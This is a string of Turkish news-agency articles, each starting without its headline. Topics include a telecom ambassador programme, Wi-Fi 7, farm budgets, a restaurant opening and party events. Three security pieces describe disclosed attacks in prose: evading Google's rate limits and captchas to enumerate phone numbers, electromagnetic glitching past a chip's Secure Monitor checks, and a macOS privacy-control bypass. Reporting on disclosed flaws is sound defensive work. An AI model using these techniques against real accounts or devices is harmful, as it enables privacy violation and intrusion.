GigaCrew topluluğuna katılacak ilk 1996 elçi, 12 ay sürecek kapsamlı bir gelişim ve etkileşim sürecine dahil olacak. Puan ve rozet sistemiyle yapılandırılan programda, tamamlanan görevler ve üretilen içerikler doğrultusunda çeşitli ödüller kazanılabilecek. Elçilerin performansı; referans katkısı, içerik üretimi ve topluluk içi aktiflik kriterlerine göre düzenli olarak takip edilecek.

GigaLearn ile Eğitim ve Mentorluk Desteği
Program, Turknet ofisinde düzenlenen lansman etkinliğiyle başladı. GigaCrew elçileri, GigaLearn platformu üzerinden yazılı ve sözlü içerik üretimine odaklanan eğitimlere katılacak. Influencer buluşmaları, mentorluk oturumları ve teknoloji okuryazarlığı, yapay zekâ ile sosyal medya stratejileri gibi alanlarda uzman iş ortaklarının katkı sunduğu eğitimler program kapsamında yer alacak.

Özel Panel ve Referans Sistemi
Programa kabul edilen katılımcılara; özel referans linkleri, içerik rehberleri ve ödül süreçlerini takip edebilecekleri kişisel paneller tanımlanacak. Katılımcılar, Turknet Gigafiber deneyimini çevrelerine aktararak hem kazanç sağlayacak hem de topluluğun büyümesine katkıda bulunacak.

Başvurular Online Alınıyor
GigaCrew programına katılmak isteyen adaylar, www.turk.net/gigacrew adresi üzerinden başvuru yapabiliyor. Adaylardan sosyal medya veya forum profillerini paylaşmaları ve motivasyonlarını anlattıkları bir video bağlantısı eklemeleri isteniyor. Programa katılım için Turknet abonesi olma şartı aranmazken, yaratıcı bakış açısı ve “kurucu elçi” ruhu temel kriterler arasında yer alıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırmacı, JavaScript kapalıyken dahi çalışan bu formun, belirli HTTP istekleri aracılığıyla bir telefon numarasının belirli bir ad-soyad ile eşleşip eşleşmediğini doğruladığını tespit etti. Bu mekanizma sayesinde, doğru parametreler kullanıldığında bir Google hesabının varlığı ve ilişkili telefon numarası hakkında doğrulama yapılabildi.

İki Aşamalı Doğrulama Mekanizması
İlk aşamada, hesap kurtarma formuna girilen telefon numarasıyla bir oturum anahtarı üretildi. İkinci aşamada ise bu anahtar kullanılarak ad ve soyad bilgileriyle doğrulama yapıldı. Sistem, eşleşme durumunda kullanıcıyı farklı bir kurtarma sayfasına yönlendirerek hesabın varlığını dolaylı olarak doğruladı.

Başlangıçta IP bazlı hız sınırlaması ve captcha engeliyle karşılaşan araştırmacı, BotGuard doğrulama token’ının, JavaScript’li formdan alınıp JavaScript’siz forma entegre edilmesiyle bu engellerin aşıldığını belirtti. Bu yöntemle, veri merkezi IP’leri üzerinden dahi yüksek hacimli sorguların mümkün hale geldiği ifade edildi.

IPv6 ve Büyük Ölçekli Denemeler
Araştırmada, IPv6 adres alanlarının sunduğu genişlikten faydalanılarak her istek için farklı bir IP kullanıldığı, bu sayede hız sınırlamalarının etkisiz hale getirildiği kaydedildi. Araştırmacı, geliştirdiği araçla saniyede on binlerce deneme yapılabildiğini aktardı.

Ülke Kodu ve İsim Bilgileri de Tespit Edilebildi
Telefon numarasının ülke kodu, Google’ın “şifremi unuttum” akışında gösterdiği maskeli numara formatları üzerinden belirlenebildi. Araştırmacı, bu formatların Google’ın kullandığı açık kaynaklı libphonenumber kütüphanesiyle birebir örtüştüğünü belirtti.

Kullanıcının ad ve soyad bilgisine ise Google Looker Studio üzerinden ulaşıldı. Araştırmacı, oluşturulan bir belgenin hedef kullanıcıya devredilmesiyle, kullanıcının hiçbir etkileşimi olmadan adının ana sayfada görüntülendiğini kaydetti.

“İstismar Olasılığı Düşük Denildi, Ödül Artırıldı”
Açık, 14 Nisan 2025’te Google’a bildirildi. Google, ilk değerlendirmede istismar olasılığını düşük bularak sınırlı bir ödül verdi. Araştırmacının itirazı sonrası yapılan yeniden değerlendirmede ise etkinin yüksek olduğu kabul edilerek ödül toplam 5 bin dolar seviyesine çıkarıldı.

Google, 22 Mayıs 2025 itibarıyla geçici önlemlerin devreye alındığını, 6 Haziran 2025’te ise JavaScript’siz kullanıcı adı kurtarma formunun tamamen devre dışı bırakıldığını doğruladı. Açık, 9 Haziran 2025’te kamuoyuna açıklandı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Ziyaret, MHP Beykoz İlçe Başkanı Emre Çömlekçi öncülüğünde, Teşkilat Başkanı Mehmet Gündoğdu’nun organizasyonuyla gerçekleştirildi. Programa Belediye Meclis Üyesi Bülent Gökdağ, ilçe yöneticileri, KAÇEP Başkanı Hatice Hacimahmutoğlu, KAÇEP mensubu kadınlar ile Beykoz Ülkü Ocakları yönetim kademesinden gençler katıldı.

Emanete Sahip Çıkma Vurgusu
Satılmış Kurtuluş’un evinde samimi bir atmosferde gerçekleşen ziyarette, 100. yaş günü için hazırlanan pasta hep birlikte kesildi. Teşkilat mensupları, Satılmış Kurtuluş’un elini öperek hayır dualarını aldı. Alınan dualar, ülkücü şehitlerin aziz hatırasına duyulan saygının ve emanet bilincinin güçlü bir yansıması olarak değerlendirildi.

Vefa Kültürü ve Dava Şuuru Öne Çıktı
Ziyaret boyunca yapılan sohbetlerde, ülkücü hareketin temel değerleri olan vefa kültürü, dava şuuru ve emanet anlayışı ön plana çıktı. Ülkücü şehitlerin geride bıraktığı emanetlere sahip çıkmanın, geçmişten geleceğe uzanan bir sorumluluk olduğu vurgulandı.

Satılmış Kurtuluş’un yaşam tecrübeleri ve hatıraları, özellikle genç ülküdaşlar için anlamlı ve öğretici bir buluşmaya dönüştü. Teşkilat yetkilileri, bu tür ziyaretlerin büyüklerle gönül bağını güçlendirdiğini ve teşkilat içindeki dayanışmayı pekiştirdiğini ifade etti.

Program, iyi dileklerin iletilmesi, sağlık ve huzur temennilerinin paylaşılması ve hatıra fotoğraflarının çekilmesiyle sona erdi. MHP Beykoz Teşkilatı, Satılmış Kurtuluş’a sağlıklı, huzurlu ve bereketli bir ömür temennisinde bulundu.

Bu gönderiyi Instagram'da gör

beykozun Sesi (@beykozunsesicom)'in paylaştığı bir gönderi

Kaynak: CUMHA - CUMHUR HABER AJANSI

Wi-Fi 4 ve Wi-Fi 5 Temel Seviyede Kaldı
802.11n olarak bilinen Wi-Fi 4, uzun menzil avantajına rağmen düşük hız ve kararsız bağlantı nedeniyle günümüz internet kullanımında yetersiz kalıyor. 802.11ac standardındaki Wi-Fi 5 ise teorik olarak yüksek hızlar sunsa da, sadece 5 GHz bandında yüksek performans sağlaması nedeniyle duvar arkası çekim gücü sınırlı kalırken, 2.4 GHz ihtiyaçlarında eski standartlara güvenmek zorunda kalıyor. Kalabalık ağlarda performans kaybı yaşanması da Wi-Fi 5’in en önemli dezavantajları arasında yer alıyor.

Wi-Fi 6 ve Wi-Fi 6E Günlük Kullanımın Omurgası
802.11ax yani Wi-Fi 6, OFDMA ve MU-MIMO teknolojileri sayesinde aynı anda çok sayıda cihazda düşük gecikmeli ve stabil bağlantı sunuyor. Wi-Fi 6E ise bu yapıyı 6 GHz bandına taşıyarak paraziti ciddi ölçüde azaltıyor. Özellikle oyun, yayın ve yüksek hızlı veri transferlerinde Wi-Fi 6E öne çıkıyor.

Wi-Fi 7 Hızların Ötesinde Bir Bağlantı Sunuyor
Yeni nesil Wi-Fi 7 (IEEE 802.11be), 1997’den bu yana kullanılan 802.11 standartlarının yedinci nesli olarak tanımlanıyor. Wi-Fi 6 ve 6E’nin tüm avantajlarını devralan Wi-Fi 7, 320 MHz bant genişliği ve 4096-QAM (4K-QAM) gibi teknolojilerle veri aktarımını yeni bir seviyeye taşıyor. Teorik olarak 46 Gbps hıza ulaşabilen standart, gerçek kullanımda 5 – 10 Gbps seviyelerinde performans sunabiliyor.

320 MHz Bant Genişliği ile İki Kat Veri Kapasitesi
Wi-Fi 6E’de 160 MHz ile sınırlı olan kanal genişliği, Wi-Fi 7’de 320 MHz’ye kadar çıkarılıyor. Bu yapı, aynı anda çok daha fazla verinin aktarılmasına olanak tanırken, özellikle 6 GHz bandında üç yeni 320 MHz kanal dikkat çekiyor. Daha geniş bant, yoğun ağ ortamlarında bile yüksek hızın korunmasını sağlıyor.

4K-QAM ile Daha Yoğun Veri Aktarımı
Wi-Fi 7, 4096-QAM modülasyonu sayesinde Wi-Fi 6 ve 6E’ye kıyasla veri aktarım hızlarını yüzde 20’ye kadar artırabiliyor. Daha yüksek QAM değeri, aynı süre içinde daha fazla bilginin iletilmesine imkân tanıyor.

Multi-Link Operation ile Kopmalar Azalıyor
Wi-Fi 7’nin en dikkat çeken özelliklerinden biri olan Multi-Link Operation (MLO), cihazların aynı anda 2.4 GHz, 5 GHz ve 6 GHz bantlarına bağlanabilmesini sağlıyor. Bu sayede bantlar eş zamanlı kullanılarak hız artışı sağlanırken, bağlantı kopmaları ve ani gecikmeler minimum seviyeye indiriliyor.

MRU ve Puncturing ile Verimlilik Artıyor
Wi-Fi 7, Çoklu Kaynak Birimi (MRU) ve Puncturing teknolojileriyle, parazit nedeniyle kullanılamayan kanal bölümlerinin boşa gitmesini engelliyor. Kullanılabilir spektrumun tamamından faydalanılması, bağlantıların daha hızlı ve güvenilir olmasını sağlıyor.

16x16 MU-MIMO ile Yüksek Kapasite
Wi-Fi 7, 16x16 MU-MIMO desteğiyle aynı anda çok daha fazla cihazın yüksek hızda veri alışverişi yapmasına imkân tanıyor. Bu yapı, akıllı evler, yoğun ofis ağları ve endüstriyel IoT sistemleri için kritik önem taşıyor.

Kullanım Alanları Genişliyor
Wi-Fi 7; 8K video akışı, bulut oyunlar, VR, AR, MR uygulamaları, akıllı ev sistemleri, Endüstri 4.0 ve kurumsal ağlar için tasarlanmış bir altyapı sunuyor. Uzmanlara göre Wi-Fi 7, fiber hızlarına yakın kablosuz bağlantı deneyimiyle önümüzdeki yılların standart teknolojisi olmaya aday.

8K Video Akışı ve Yüksek Çözünürlüklü Yayınlar
Wi-Fi 7, sunduğu ultra yüksek bant genişliği ve düşük gecikme avantajı sayesinde 8K video akışı gibi yüksek veri gerektiren içeriklerin kesintisiz şekilde izlenmesine imkân tanıyor. Geniş kanallar ve gelişmiş modülasyon teknikleri, aynı anda birden fazla yüksek çözünürlüklü yayının sorunsuz biçimde aktarılmasını sağlıyor.

VR, AR ve MR Uygulamalarında Yeni Dönem
Sanal gerçeklik (VR), artırılmış gerçeklik (AR) ve karma gerçeklik (MR) uygulamaları, gecikmeye karşı son derece hassas yapılarıyla biliniyor. Wi-Fi 7, Multi-Link Operation ve ultra düşük gecikme özellikleri sayesinde bu uygulamalarda daha akıcı, daha gerçekçi ve daha stabil bir deneyim sunuyor.

Endüstri 4.0 ve Kurumsal Ağlarda Wi-Fi 7 Etkisi
Wi-Fi 7, Endüstri 4.0 kapsamında kullanılan endüstriyel IoT cihazları, otomasyon sistemleri ve kurumsal ağ altyapıları için yüksek kapasite ve güvenilir bağlantı sağlıyor. Aynı anda çok sayıda cihazın veri alışverişi yapabilmesi, üretim ve operasyon süreçlerinde verimliliği artırıyor.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Araştırma, üç bölüm halinde yayımlandı. İlk bölümde çipin EMFI saldırılarına karşı karakterizasyonu, ikinci bölümde Secure Monitor içinde rastgele okuma ve yazma elde edilmesi, üçüncü bölümde ise EL3 seviyesinde kalıcı kod yürütme ayrıntıları paylaşıldı. Araştırmacılar, “Amaç, donanım tabanlı güvenlik mekanizmalarının gerçek dünyada ne kadar dayanıklı olduğunu ölçmekti.” ifadelerini kullandı.

Elektromanyetik Hata Enjeksiyonu Nasıl Çalışıyor
EMFI yöntemi, işlemci üzerine çok kısa süreli ve yüksek enerjili elektromanyetik darbeler uygulanmasına dayanıyor. Bu darbeler sayesinde işlemcinin yürüttüğü talimatların bozulabildiği belirtiliyor. Araştırmacılar, “Bir kontrol talimatı atlanabiliyor ya da beklenen işlem yerine farklı bir komut yürütülebiliyor.” değerlendirmesinde bulundu.

Secure Monitor Kontrolleri Atlatıldı
Çalışmanın ikinci aşamasında, Secure Monitor tarafından uygulanan adres doğrulama mekanizmalarının hedef alındığı aktarıldı. Normal şartlarda yalnızca izin verilen bellek alanlarına erişim sağlayan is_allowed_address benzeri kontrollerin, doğru zamanlamayla yapılan EMFI saldırıları sonucunda devre dışı bırakılabildiği kaydedildi. Bu sayede, EL3 bağlamında rastgele 32 bit okuma ve yazma yapılabildiği vurgulandı.

XPU Yapılandırması Değiştirildi
Araştırmanın en kritik aşamasında, TrustZone adres alanlarını koruyan XPU yapılandırmasının yeniden programlanabildiği belirtildi. Araştırmacılar, “Tek bir başarılı glitch, Secure Monitor içinde keyfi uzunlukta kod yürütmek için yeterli.” ifadesini kullandı. Bu durumun, cihazın en korumalı yazılım katmanının tamamen kontrol altına alınması anlamına geldiği aktarıldı.

Saldırı Zor Ama Mümkün
Araştırmacılar, saldırının pratikte yüksek beceri, hassas ekipman ve uzun deneme süreleri gerektirdiğini belirtti. Ortalama başarı süresinin 30 ila 40 dakika arasında değiştiği, çok sayıda yeniden başlatma ve zamanlama denemesi gerektiği kaydedildi. Buna rağmen, elde edilen sonucun teorik değil, pratik olarak uygulanabilir olduğu vurgulandı.

Donanım Güvenliği Tartışması
Çalışma, gömülü ağ cihazlarında yalnızca yazılımsal önlemlerin yeterli olmayabileceğini ortaya koydu. Araştırmacılar, “TrustZone ve Secure Monitor gibi donanım destekli güvenlik katmanları bile fiziksel saldırılar karşısında aşılabilir.” değerlendirmesinde bulundu. Fiziksel erişim sağlanan cihazlarda, en yüksek ayrıcalık seviyesinin dahi ele geçirilebileceği uyarısı yapıldı.

Kaynak: CUMHA - CUMHUR HABER AJANSI

VoiceOver Çerçevesi Üzerinden İstismar
Güvenlik araştırmacıları, açığın VoiceOver framework’ü ve com.apple.scrod adlı sistem servisi üzerinden tetiklendiğini belirtti. Bu yöntemle saldırganların, Apple tarafından imzalanmış süreçlere kod enjekte edebildiği ve bu süreçler aracılığıyla AppleScript çalıştırabildiği ifade edildi.

TOCTOU Yarış Koşulu ile Tam TCC Aşımı
İstismarın temelinde, Time-of-Check-Time-of-Use (TOCTOU) türü bir yarış koşulunun yer aldığı kaydedildi. Kod enjeksiyonu ile bu yarış koşulunun birlikte kullanılması sonucunda, saldırganların Finder ile etkileşime girebildiği, dosya okuyabildiği, mikrofona erişebildiği ve keyfi AppleScript komutları çalıştırabildiği aktarıldı. Tüm bu işlemlerin kullanıcıya herhangi bir bildirim gönderilmeden gerçekleştiği vurgulandı.

Apple: Açık macOS 26.2 ile Kapatıldı
Apple, güvenlik açığının macOS 26.2 sürümünde giderildiğini duyurdu. Şirket, com.apple.private.accessibility.scrod yetkisinin artık process audit token üzerinden doğrulandığını ve bu sayede hem kod enjeksiyonu açığının hem de TOCTOU penceresinin ortadan kaldırıldığını açıkladı.

Kullanıcılara Güncelleme Çağrısı
Apple, kullanıcıların sistemlerini en kısa sürede güncellemelerini önerdi. Güncellemenin, macOS → System Settings → Software Update adımları izlenerek yapılabileceği hatırlatıldı. Güvenlik uzmanları, açığın kapsamı nedeniyle güncellemenin geciktirilmemesi gerektiğini belirtti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

“Çiftçiye Hak Ettiği Destek Verilmiyor”
Tarım ve Orman Bakanlığı’nın 2026 yılı bütçesinin 542 milyar lira olarak belirlendiğini hatırlatan Gürer, Tarım Kanunu’nun 21. maddesine göre çiftçiye verilmesi gereken desteğin millî gelirin yüzde 1’i olduğunu ve bu tutarın 772 milyar liraya ulaştığını söyledi. Buna karşın tarımsal destek için ayrılan kaynağın yalnızca 168 milyar lira olduğuna dikkat çeken Gürer, “Tarım Kanunu’na göre verilmesi gereken destek çiftçiye verilmiyor. Bu rakam çiftçilerimiz için yeterli değil.” dedi.

“542 Milyar Lirayla Tüm Sorunlar Nasıl Çözülecek?”
Gürer, Tarım ve Orman Bakanlığı’nın 542 milyar liralık bütçeyle sulama suyu sorununu, arazi toplulaştırmasını, çiftçi desteklerini ve tarımda ortaya çıkan yapısal sorunları nasıl çözeceğini sorguladı. Küresel iklim değişikliğinin etkilerine dikkat çeken Gürer, Türkiye’nin ciddi bir su ve sulama sorunu yaşadığını, baraj, gölet, kapalı sulama, damlama ve yağmurlama yatırımlarının da bu sınırlı bütçeyle karşılanmaya çalışıldığını kaydetti.

“Borçlu Çiftçiye Kredi Yok, Üretimden Kopuş Var”
Bu yıl başlatılan uygulamayla BAĞ-KUR prim borcu bulunan çiftçilere bankalar tarafından kredi verilmediğini söyleyen Gürer, krediye erişemeyen çiftçinin üretimde kalamadığını vurguladı. Çiftçilerin bankalara olan borcunun 1 trilyon 2 milyar liraya ulaştığını belirten Gürer, “Bu kadar borcu olan çiftçiye destek verilmezse tarım nasıl sürdürülecek?” diye konuştu.

“Çiftçiye Verilen Destek Gıda Güvencesidir”
Çiftçiye ve besiciye sağlanan desteğin ülkenin geleceğine yapılan bir yatırım olduğunu dile getiren Gürer, “Bu yıl yağmur var, kar var, umut var. Ancak bu umudu canlı tutmak için desteklerin zamanında verilmesi gerekiyor.” ifadelerini kullandı. Gürer, geçen yıl nisan ayında yaşanan don olayında TARSİM ve ÇKS kaydı olan üreticilere dahi ödemelerin tamamlanmadığını, kaydı olmayanlara ise destek verilmediğini hatırlattı.

“Destek Olmazsa Raf Fiyatları Düşmez”
Zamanında, doğru ve yeterli destek verilmediği sürece market raflarındaki fiyatların düşmeyeceğini belirten Gürer, artan girdi maliyetlerinin tarımı çıkmaza sürüklediğini söyledi. Üretimin pahalı hâle geldiğini, kırsaldan kente göçün arttığını ve çiftçi yaş ortalamasının 58’e yükseldiğini ifade eden Gürer, gençlerin tarıma yönelmesi için desteklerin artırılması gerektiğini vurguladı.

“Tarımı Kilitlemeyin”
Tarımda en büyük sorunlardan birinin girdi maliyetleri olduğunu belirten Gürer, yem, gübre, tohum, ilaç, mazot, işçilik, traktör, biçerdöver, elektrik ve su giderlerindeki artışların ürün maliyetlerine yansıdığını söyledi. Ürünlerin üreticiden çıktıktan sonra en az dört el değiştirdiğini kaydeden Gürer, “Rafa ulaşıncaya kadar fiyatlar katlanıyor. Üreten ürettiğinden mutlu olamıyor, tüketen pahalı ürün almak zorunda kalıyor.” dedi.

Kaynak: CUMHA - CUMHUR HABER AJANSI

Açılış günü boyunca yapılan röportajlar, işletmeci açıklamaları, vatandaş görüşleri ve tören anları CUMHA tarafından kayda alındı.

CUMHA Ankara Temsilcisi Serdar Nalcı, açılış alanında yaptığı değerlendirmede, Ankara’da marka değerine katkı sunan işletmeleri yakından takip ettiklerini belirterek, açılış sürecini hem işletmeciler hem de vatandaşlar açısından yerinde gözlemlediklerini ifade etti.

Açılış programı, imam duası eşliğinde gerçekleştirilen kurdele kesimiyle devam etti. Yapılan duada işletmenin hayırlı kazançlara vesile olması, çalışanların ve müşterilerin sağlıkla hizmet alması temennisinde bulunuldu. Dua sonrası işletme resmen hizmete başladı.

Açılışta konuşan şube işletmecisi Mahmut Kadıoğlu, Doğukent bölgesinde gece saatlerinde kaliteli döner hizmeti sunmayı amaçladıklarını belirterek, “Türkiye’ye gece dönerini sevdiren markanın şubesini açmış olmaktan mutluluk duyuyoruz. Dönerimiz kaliteli, lezzetli. Mamak halkını, Doğukent halkını ve tüm Ankaralıları bekliyoruz.” ifadelerini kullandı.

Şube işletmecilerinden Eyyüp Kaan Kadıoğlu da Doğukent lokasyonunun tercih edilme nedenlerine değinerek, bölgede gece hizmet veren kaliteli bir döner işletmesine ihtiyaç olduğunu söyledi. Kadıoğlu, “Natevega ve metroya yakın bu bölgede böyle bir mekanın olmaması bizi cezbetti. Markaya güvendiğimiz için bu noktada hizmet vermeye başladık.” dedi.

Aile adına yapılan değerlendirmede ise işletmenin yalnızca ticari bir faaliyet değil, aynı zamanda Doğukent ve Mamak halkına yönelik uzun vadeli bir hizmet anlayışıyla açıldığı vurgulandı.

Ankara Gece Dönercileri Yönetim Kurulu Üyesi Enes Çelik, markanın büyüme sürecine ilişkin bilgi verdi. Çelik, Doğukent Şubesi’nin Ankara’daki 12’nci şube olduğunu belirterek, 2018 yılından bu yana gıda sektöründe faaliyet gösterdiklerini ve şubeleşme sürecinin hızla devam ettiğini söyledi.

Enes Çelik, dönerin üretim sürecine ilişkin de detay paylaşarak, kullanılan etin niteliği, yağ oranı ve hijyen standartlarına dikkat çekti. Çelik, dönerin kısa buttan hazırlandığını, kuyruk yağı kullanıldığını ve dışarıdan ekleme yağ bulunmadığını ifade etti.

Açılışta görev yapan döner ustası da yaptığı kısa açıklamada, dönerin taze ve sıcak kesim olarak servis edildiğini belirterek Doğukent ve Mamak halkını işletmeye davet etti.

Açılışa katılan vatandaşlar ise CUMHA mikrofonuna yaptıkları değerlendirmelerde dönerin lezzetini, servis hızını ve gece geç saatlere kadar hizmet verilmesini olumlu bulduklarını ifade etti. Daha önce markanın farklı şubelerinde döner yediğini belirten bir vatandaş, Doğukent Şubesi’nde de aynı lezzeti bulduğunu söyledi.

Bir başka katılımcı ise etin kalitesine dikkat çekerek, dönerin damak tadına uygun olduğunu ve çevresindeki tanıdıklarına da tavsiye edeceğini dile getirdi.

Açılış alanında bulunan farklı yaş gruplarından katılımcılar da kalabalığa dikkat çekerken, Doğukent Caddesi’nde böyle bir işletmenin uzun süredir eksik olduğunu ifade etti.

Açılış sırasında çocukların da kısa değerlendirmelerde bulunduğu ve aileleriyle birlikte açılış atmosferine katıldığı görüldü.

Açılışın ardından Ankara Gece Dönercisi Doğukent Şubesi, gece saatlerine kadar hizmet vermeye başladı. İşletme yetkilileri, Doğukent ve çevre mahallelerden gelen vatandaşları şubeye davet etti.

Kaynak: CUMHA - CUMHUR HABER AJANSI

DR. FATİH ERBAKAN: “TECRÜBE VE ENERJİYLE İKTİDARA YÜRÜYECEĞİZ”
Dr. Fatih Erbakan, konuşmasında gençliğin dinamizmi ile büyüklerin tecrübesinin birlikte hareket etmesi halinde teşkilatın hedeflerine ulaşacağını vurguladı. Erbakan, yeni dönemin hayırlı olmasını dileyerek, çalışma temposu ve sahadaki disiplinin önemine dikkat çekti.

“MİLLİ GÖRÜŞ DAVASI HAK İLE BATIL MÜCADELESİNİN TARAFIDIR”
Erbakan, milli görüş vurgusunu tarihsel bir çerçeveyle ele alarak, davanın kuşaktan kuşağa taşınan bir sorumluluk olduğunu ifade etti. Konuşmasında, mücadelenin “hakkın tarafında durmak” anlamı taşıdığını kaydetti.

“HAK, HER ŞARTTA DOĞRU VE ADİL OLANDIR”
Erbakan, “hak” kavramını; doğru, faydalı, iyi, güzel ve adil olanın hâkim kılınması olarak tarif ederek, bu anlayışın siyasi mücadelenin temel çizgisini oluşturduğunu dile getirdi.

“ISLAH EDİCİ DURUŞ” VE “İFSAT” VURGUSU
Erbakan, toplumsal düzeni bozan yöntemlere karşı “ıslah” kavramını öne çıkarırken, değerler ve düzen üzerinde yürütülen tartışmaların bir “mücadele alanı” olduğuna işaret etti.

EKONOMİ BAŞLIĞI: “FAİZ BORCU AĞIR BİR YÜK ÜRETİYOR”
Erbakan, konuşmasında faiz ve borç üzerinden oluşan tabloya ilişkin değerlendirmelerde bulundu. Faiz üzerinden şekillenen mali yapının hem kamu hem vatandaş üzerinde ağır bir yük oluşturduğunu söyledi.

“KARŞILIKSIZ DOLAR DÜZENİ” ELEŞTİRİSİ
Erbakan, konuşmasında para düzeni üzerinden kurulan mekanizmalara değinerek, ülkelerin ekonomik bağımsızlığının güçlendirilmesi gerektiğini vurguladı.

TOPLUM VE DEĞERLER: “NESLİ KORUYACAĞIZ”
Erbakan, toplumsal alanda yürütülen tartışmalara dair değerlendirmelerinde aile, nesil ve değerler başlıklarını öne çıkardı. Manevi kalkınma vurgusuyla, toplumun temel dinamiklerinin korunması gerektiğini ifade etti.

DIŞ POLİTİKA VE ORTAK MEKANİZMALAR VURGUSU
Erbakan, Türkiye’nin yön arayışına ilişkin değerlendirmelerinde D-8’in canlandırılması ve ortak mekanizmalarla güç birliği hedefini dile getirdi.

TEŞKİLAT HEDEFLERİ: “TERLEMEK” VURGUSU
Erbakan, teşkilat hedefleri ve saha disiplinine ilişkin bölümde, çalışmanın sürekliliğine dikkat çekti. Üye ve mahalle yapılanması hedefleri üzerinden yeni dönemde yoğun çalışma çağrısı yaptı.

MANEVİ DİSİPLİN MESAJI
Erbakan, manevi disiplin vurgusuyla, mücadelenin sahadaki emek kadar kişisel sorumluluklarda da titizlik gerektirdiğini söyledi. Konuşmasının bu bölümünde, yeni görev alan gençlere başarı dileyerek yeni dönemin hayırlı olmasını temenni etti.

CUMHA ÖZEL: DR. FATİH ERBAKAN’DAN GENÇLİK VURGUSU
CUMHA Genel Koordinatörü Hüseyin Bekar’ın sorularını yanıtlayan Dr. Fatih Erbakan, partinin gençliğin desteği ve coşkusuyla yoluna devam ettiğini söyledi. Erbakan, genç üyeler ve gençlik teşkilatlarının sahada aktif çalıştığını belirterek, gençlik çalışmalarına büyük önem verdiklerini ifade etti.

GENÇLİK KOLLARI GENEL BAŞKANI SELÇUK EFE: “BU KADROLAR TÜRK SİYASETİNİN GELECEĞİNDE OLACAK”
Gençlik Kolları Genel Başkanı Selçuk Efe, CUMHA’ya yaptığı açıklamada, yeni dönemde geniş katılımlı bir yönetim ve başkanlık divanı oluşturduklarını söyledi. Efe, “Bu kadro iktidara yürüyecek.” mesajıyla yeni dönemin hedeflerini anlattı.

SELÇUK EFE: “GENÇLİĞİN EN BÜYÜK SORUNU UMUTSUZLUK”
Efe, genç işsizliği ve ekonomik baskının gençlerin gelecek planlarını etkilediğini belirterek, “Gençliğin en büyük sorunu umutsuzluktur.” değerlendirmesinde bulundu.

SELÇUK EFE: “FAİZSİZ EVLİLİK KREDİSİ GENÇLERE NEFES OLUR”
Efe, gençlerin aile kurma sürecine ilişkin değerlendirmelerinde faizsiz evlilik kredisi modeline değinerek, uygulamanın kapsamının genişletilmesi gerektiğini söyledi.

GENÇLİK KOLLARI GENEL BAŞKAN YARDIMCISI ÖMER FARUK AK: “YENİ DÖNEM SAHADA YÜRÜYECEK BİR PLANLAMADIR”
Gençlik Kolları Genel Başkan Yardımcısı Ömer Faruk Ak, yeni dönemin yalnızca bir duyuru olmadığını, sahada uygulanacak planlı bir çalışma döneminin başladığını vurguladı. Ak, yeni dönemde gençlik kollarının nasıl siyaset yapacağını ve teşkilata nasıl katkı sunacağını anlattı.

ÖMER FARUK AK: “GENÇLİĞİN SORUNLARININ TEMELİNDE EKONOMİ VAR”
Ak, gençlerin sorunlarının temelinde ekonomik sıkışmışlığın yer aldığını belirterek, bölgelere göre farklılaşan sorunlara yönelik gençlik analizi çalışması yürüttüklerini söyledi.

GENÇLİK KOLLARI MKYK ÜYESİ MUSTAFA ÇİÇEK: “SAHAYA ÇIKIŞ MESAJI VERİLDİ”
Gençlik Kolları MKYK Üyesi Mustafa Çiçek, lansman toplantısında yeni yönetimin tanıtıldığını ve teşkilatın sahada çalışmaya hazır olduğunu dile getirdi. Çiçek, “Yarın seçim varmış gibi hazırız.” ifadesiyle motivasyon vurgusu yaptı.

GENEL BAŞKAN YARDIMCISI BÜLENT OSMANAĞAOĞLU: “GENÇLİK 81 İLDE TEŞKİLATLANMIŞ GÜÇLÜ BİR YAPI”
Genel Başkan Yardımcısı Bülent Osmanağaoğlu, gençlik kollarının ülke genelindeki örgütlenmesine dikkat çekerek, yeni başkan ve yönetimine başarı dileklerini iletti.

GENEL BAŞKAN YARDIMCISI MEHMET ALTINÖZ: “GENÇLİK VE KADIN KOLLARI İKİ KANATTIR”
Genel Başkan Yardımcısı Mehmet Altınöz, gençlik teşkilatı ile kadın kollarını partinin temel güç unsurları olarak tanımlayarak, “iki kanat” benzetmesi yaptı. Altınöz, yeni dönemde sahada daha görünür bir süreç hedeflediklerini ifade etti.

MEHMET ALTINÖZ: “ASGARİ ÜCRET 45 BİN LİRA OLMALI”
Altınöz, asgari ücret ve emekli maaşı başlığında “en düşük emekli maaşı asgari ücretle eşitlenmeli.” değerlendirmesini yaptı. Altınöz, asgari ücret için “45 bin lira” hedefini dile getirirken, kaynak tartışmasına ilişkin faiz, imtiyazlı ihaleler ve israf başlıklarını sıraladı.

MEHMET ALTINÖZ: “ÖNEMLİ OLAN SATIN ALMA GÜCÜDÜR”
Altınöz, maaş tartışmalarında nominal rakamdan ziyade vatandaşın alım gücünün esas alınması gerektiğini vurgulayarak, yaşam maliyeti ve kira örnekleri üzerinden değerlendirmelerde bulundu.

MEHMET ALTINÖZ: “İLK 100 GÜN PLANLARIMIZ HAZIR”
Altınöz, iktidara hazırlık çalışmalarına ilişkin “ilk 100 gün” ve “milli kaynak paketleri” vurgusuyla, saha verilerine dayalı planlamadan söz etti.

MEHMET ALTINÖZ: “SAHADA OLAN HAZIRDIR”
Altınöz, teşkilat çalışmaları ve saha programlarına ilişkin değerlendirmelerinde, üye artışının masa başından değil, sahada birebir çalışmayla sağlanması gerektiğini söyledi.

GENEL BAŞKANVEKİLİ PROF. DR. SACİT GÜNBEY: “BU GENÇLİK SİYASETE DEĞER KATACAK”
Genel Başkanvekili Prof. Dr. Sacit Günbey, lansman toplantısının verimli geçtiğini belirterek, genç kadronun eğitimli ve şuurlu bir yapıyı temsil ettiğini söyledi. Günbey, teşkilatın düzenli çalışmasına dikkat çekti.

SACİT GÜNBEY: “BUGÜN SEÇİM OLSA HAZIRIZ”
Günbey, seçim hazırlığına ilişkin değerlendirmesinde programlı çalıştıklarını belirterek, “bugün seçim olsa” vurgusuyla sahadaki hazırlığa işaret etti. Günbey, “Umutsuz olmaya gerek yok.” mesajı verdi.

KONYA MİLLETVEKİLİ ALİ YÜKSEL: “GENÇLİK OLMADAN MUVAFFAKİYET OLMAZ”
Konya Milletvekili Ali Yüksel, gençliğin siyasi hareketler için belirleyici olduğunu vurguladı. Yüksel, gençlerin inançlı ve motive şekilde sahada çalıştığını ifade ederek, ittifak ve siyaset gündemine ilişkin değerlendirmelerde bulundu.

